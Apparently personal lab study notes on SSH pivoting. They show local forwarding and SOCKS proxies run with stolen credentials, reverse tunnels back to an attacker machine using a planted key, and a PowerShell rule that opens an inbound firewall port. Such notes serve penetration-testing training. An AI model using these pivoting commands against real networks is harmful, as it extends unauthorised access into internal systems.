SSH Tunnelling / Port Forwarding

OpenSSH allows us to make tunnels for port forwarding and proxies.

Forward Connection

We create a tunnel from our attacking box with the stolen credentials. This attack is more common against Unix hosts since linux servers often have an ssh port open.

Port Forwarding

e.g. we want to connect to 172.16.0.10:80 from 172.16.0.5 then we use the flags

-L to enable port forwarding
<port>:<target IP>:<target port>
-f to background the shell
-N to specify that we’ll not entering commands

ssh -L 8000:172.16.0.10:80 [email protected] -fN

At this point we can now connect to the HTTP server from our own port 8000 → localhost:8000

New-NetFirewallRule -Protocol TCP -LocalPort <port> -Direction Inbound -
Action Allow -DisplayName SOCK

<aside> ⚠️ For Port forwarding on Windows, see ‣

</aside>

Proxy

With ssh we can establish a proxy connection with the flag -D <port>. When the connection is established we can now execute commands through this proxy with proxychains for instance.

ssh -D 1337 [email protected] -fN

Reverse Connection

This method may be preferable in the case of a shell without an ssh connection. However it implies to connect to the attacker machine, which represent a threat.

Set up

generate keys

ssh-keygen

and add it to ~/.ssh/authorized_keys

command="echo 'This account can only be used for port forwarding'",no-agent-forwarding,no-x11-forwarding,no-pty <public key>

Untitled

start ssh if not already done

sudo systemctl status ssh

And finally, we transfer the key in ether way it is possible.

Now we can start the ssh reverse port forward using ssh -R LOCAL_PORT:TARGET_IP:TARGET_PORT USERNAME@ATTACKING_IP -i KEYFILE -fN

ssh -R 8000:172.16.0.10:80 [email protected] -i KEYFILE -fN

Again we now have access to the targetted website through localhost:8000.

<aside> 📌 The latest versions of SSH offer reverse proxy with the same concept as SSH proxy

ssh -R 1337 USERNAME@ATTACKING_IP -i KEYFILE -fN

</aside>

<aside> 💡 Note: Modern Windows comes with an inbuilt SSH client available by default. This allows us to use this technique in Windows systems, even if there is not an SSH server running on the Windows system we're connecting back from. In many ways, this makes the next task covering plink.exe redundant; however, it is still very relevant for older systems.

</aside>

Close tunnelling connections

search for ssh processes with

ps aux | grep ssh

Untitled

and kill them with

sudo kill PID

Untitled